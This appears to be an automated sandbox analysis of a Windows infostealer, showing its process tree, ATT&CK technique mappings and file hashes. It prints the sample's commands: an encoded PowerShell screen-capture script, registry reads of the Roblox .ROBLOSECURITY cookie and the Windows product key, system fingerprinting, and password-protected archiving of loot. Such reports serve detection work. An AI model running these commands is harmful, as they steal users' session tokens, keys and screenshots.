JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnf1vuvf\qnf1vuvf.cmdline"7⤵PID:4820
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC27.tmp" "c:\Users\Admin\AppData\Local\Temp\qnf1vuvf\CSC71F7BAB440FE4FB3BC6F9BBCEF8E47B2.TMP"8⤵PID:2996
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\system32\tree.comtree /A /F6⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:756
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3684
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1852
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1072
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:4416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:1892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:4928
-
C:\Windows\system32\getmac.exegetmac6⤵PID:4580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25242\rar.exe a -r -hp"m1" "C:\Users\Admin\AppData\Local\Temp\79g7p.zip" *"5⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\_MEI25242\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI25242\rar.exe a -r -hp"m1" "C:\Users\Admin\AppData\Local\Temp\79g7p.zip" *6⤵
- Executes dropped EXE
PID:1148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:2276
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:2868
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:2604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:544
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:3916
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:3188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
-
-
-
-
C:\Windows\System32\X.exe"C:\Windows\System32\X.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2180
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x504 0x31c1⤵PID:1144
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4696
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2396
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
1KB
MD5d4154a892a07b07da27746ed39e8ef5d
SHA1f45db8a86dd4ff4a76c1929d946507db8594d6a5
SHA2563ea93c6f19fb845797177d3a4513108e58a2d23def933f68f70fdc7300cbf759
SHA51257405365db52735ba3a989bdab9281c2c5a835cc938b89831b328412b7f563396966ae4d9a5f187d81ec08b7aa287b2facbf732ed156ad29e246b0e71a7f2245
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD5b48396aa3efff45d2d2bfa0651200816
SHA1a2e13253e28f81afc4437c5f1809d9f601fc364e
SHA2569215f1ce108c190bb80c5d0013680ba8009ba760d631150a8ec78335fe8e6469
SHA5129654465cfc45d8434a035f7729212783d0dafce6a32d8b195efabcd087f26f21ec1092579e63c4aea477282f23e532c7f98bd5e443f41f1fae2d9b959940bb48
-
Filesize
6.9MB
MD537a9fdc56e605d2342da88a6e6182b4b
SHA120bc3df33bbbb676d2a3c572cff4c1d58c79055d
SHA256422ba689937e3748a4b6bd3c5af2dce0211e8a48eb25767e6d1d2192d27f1f58
SHA512f556805142b77b549845c0fa2206a4cb29d54752dc5650d9db58c1bbe1f7d0fc15ce04551853fb6454873877dbb88bebd15d81b875b405cdcc2fd21a515820d3
-
Filesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
Filesize
48KB
MD56c57219d7f69eee439d7609ab9cc09e7
SHA152e8abbc41d34aa82388b54b20925ea2fcca2af8
SHA2568e389c056a6cf8877ddf09a1ae53d1a1b1de71a32b437d992ec8195c3c8eda92
SHA512801f5b3f15e25f3be3f7ece512ffa561c97d43fff465e8fcb8afc92a94fd0bd3ec57c3e4df775beb1a6357064fad2be2ab6345bb8fe8c9b00674ade546bf6bc3
-
Filesize
58KB
MD5ee77573f4335614fc1dc05e8753d06d9
SHA19c78e7ce0b93af940749295ec6221f85c04d6b76
SHA25620bc81c1b70f741375751ae7c4a177a409b141bfcd32b4267975c67fc1b11e87
SHA512c87c9c68cb428c2305076545702e602c8119bb1c4b003fc077fc99a7b0f6ffd12cafdd7ff56dac5d150785adc920d92ea527067c8fec3c4a16737f11d23d4875
-
Filesize
106KB
MD5787f57b9a9a4dbc0660041d5542f73e2
SHA1219f2cdb825c7857b071d5f4397f2dbf59f65b32
SHA256d5646447436daca3f6a755e188ea15932ae6b5ba8f70d9c1de78f757d310d300
SHA512cd06ea22530c25d038f8d9e3cc54d1fdbc421fb7987ab6ebc5b665ae86a73b39a131daef351420f1b1cb522002388c4180c8f92d93ea15460ccba9029cac7eef
-
Filesize
35KB
MD5ff0042b6074efa09d687af4139b80cff
SHA1e7483e6fa1aab9014b309028e2d31c9780d17f20
SHA256e7ddac4d8f099bc5ebcb5f4a9de5def5be1fc62ecca614493e8866dc6c60b2ce
SHA5120ff0178f7e681a7c138bfd32c1276cf2bd6fbeb734139b666f02a7f7c702a738abdbc9dddcf9ab991dead20ec3bf953a6c5436f8640e73bdd972c585937fa47a
-
Filesize
86KB
MD558b19076c6dfb4db6aa71b45293f271c
SHA1c178edc7e787e1b485d87d9c4a3ccfeadeb7039e
SHA256eff1a7fc55efe2119b1f6d4cf19c1ec51026b23611f8f9144d3ef354b67ff4d5
SHA512f4305dcc2024a0a138d997e87d29824c088f71322021f926e61e3136a66bea92f80bce06345307935072a3e973255f9bbae18a90c94b80823fbc9a3a11d2b2f4
-
Filesize
25KB
MD5e8f45b0a74ee548265566cbae85bfab8
SHA124492fcd4751c5d822029759dec1297ff31ae54a
SHA25629e7801c52b5699d13a1d7b95fd173d4a45ab2791377ac1f3095d5edc8eba4bd
SHA5125861a0606e2c2c2ebb3d010b4591e4f44e63b9dbfa59f8bb4ac1cda4fbfdcb969864601dee6b23d313fe8706819346cfbcd67373e372c7c23260b7277ee66fbf
-
Filesize
43KB
MD56ef6bcbb28b66b312ab7c30b1b78f3f3
SHA1ca053c79ce7ea4b0ec60eff9ac3e8dd8ba251539
SHA256203daa59e7bf083176cbfcc614e3bac09da83d1d09ef4fcd151f32b96499d4b2
SHA512bec35443715f98ee42fda3697c2009c66d79b1170714ea6dedde51205b64a845194fe3786702e04c593059ee4ad4bbfa776fbc130a3400a4a995172675b3dfa9
-
Filesize
56KB
MD5467bcfb26fe70f782ae3d7b1f371e839
SHA10f836eb86056b3c98d7baf025b37d0f5fe1a01a5
SHA2566015c657b94e008e85f930d686634d2cafa884fd8943207ee759bc3a104c0f48
SHA51219362aa94e6e336fd02f1f60fde9c032a45315f7973a1e597761ae3b49b916aecd89934b8ed33ee85fd53e150a708a4f8f2a25683fb15491daa8430c87a6511c
-
Filesize
65KB
MD596af7b0462af52a4d24b3f8bc0db6cd5
SHA12545bb454d0a972f1a7c688e2a5cd41ea81d3946
SHA25623c08f69e5eaa3a4ab9cab287d7dc2a40aca048c8b3c89992cdb62d4de6eb01f
SHA5122a8ed5a4143b3176e96d220f0255da32a139909dd49625ef839c2dfce46e45f11a0b7340eb60ad1f815a455333e45aece6e0d47a8b474419e3cbbbd46f01c062
-
Filesize
1.4MB
MD56e706e4fa21d90109df6fce1b2595155
SHA15328dd26b361d36239facff79baca1bab426de68
SHA256ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998
SHA512c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34
-
Filesize
115KB
MD56febc919ec57b060b7a28dfa282b0355
SHA18821bcfe5c26b51feaa8710e8816cfe6d466b77f
SHA2568dfe35f80d86b10b7f1aa20e614677de3a0bfb28554069061e1091dd8a8fa828
SHA512fe83f6acffb13d4ad2511ac19c74b006fe4ea699afcfb3536403afd2e1491fbf5191b94b5873ac753245d7fc9c871025ac7b5833a0b1cac57ddbe7bb56e134dc
-
Filesize
1.6MB
MD57f1b899d2015164ab951d04ebb91e9ac
SHA11223986c8a1cbb57ef1725175986e15018cc9eab
SHA25641201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986
SHA512ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
222KB
MD5264be59ff04e5dcd1d020f16aab3c8cb
SHA12d7e186c688b34fdb4c85a3fce0beff39b15d50e
SHA256358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d
SHA5129abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248
-
Filesize
1.6MB
MD5b167b98fc5c89d65cb1fa8df31c5de13
SHA13a6597007f572ea09ed233d813462e80e14c5444
SHA25628eda3ba32f5247c1a7bd2777ead982c24175765c4e2c1c28a0ef708079f2c76
